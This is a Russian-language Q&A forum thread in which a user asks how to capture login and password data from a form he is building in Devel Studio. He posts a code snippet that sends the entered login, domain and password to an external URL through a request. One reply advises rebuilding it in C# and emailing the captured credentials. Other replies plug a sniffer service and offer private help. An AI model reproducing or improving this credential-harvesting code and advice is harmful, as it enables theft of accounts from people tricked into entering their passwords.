Подскажите, плиз, сниффер!

Ego Ivlev Ученик (165), на голосовании 5 лет назад
Нужен сниффер для проги, который записывает в базу логин и пароль. Прогу делаю на Devel Studio, это не вирус, перед другом похвалиться. Код:
$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText
$url = "";
file_get_contents($url . "?" . "login:" . $edit1 . "|domian" . $combobox1 . "|pass:" . $edit2);
Нужен сниффер в строку с URL, чтобы давал в данном случае Логин и Пароль. Использовал так называемый online - sniffer. ru, не работает.
Голосование за лучший ответ
Imobilazer Искусственный Интеллект (222384) 5 лет назад
В этом говне никто ничего не программирует, только такие вот "кулхацкеры" разве что, ибо существуют нормальные ИДЕ

Лично я бы сделал на шарпах и слал бы например на почту данные, без сторонних левых сервисов

Понаходите древних говноуроков и пытаетесь по ним что-то делать)
Ego IvlevУченик (165) 5 лет назад
сорян... что такое шарпы?))
Imobilazer Искусственный Интеллект (222384) Язык программирования C# Можно сделать ту же форму и просто отправлять письмо на нужный ящик с нужными данными Есть и куча примеров и нормальная официальная документация, да и вообще информацию найти не проблема
Редис Александрович Оракул (76886) 5 лет назад
devel studio не подойдет надо хотя бы C++ или C#
Алёна Михненко Ученик (134) 5 лет назад
Пиши в вк помогу - vk . com / 0xffe
Елена Малышева Ученик (127) 3 года назад
Новый бесплатный онлайн сниффер: https://httpz.tech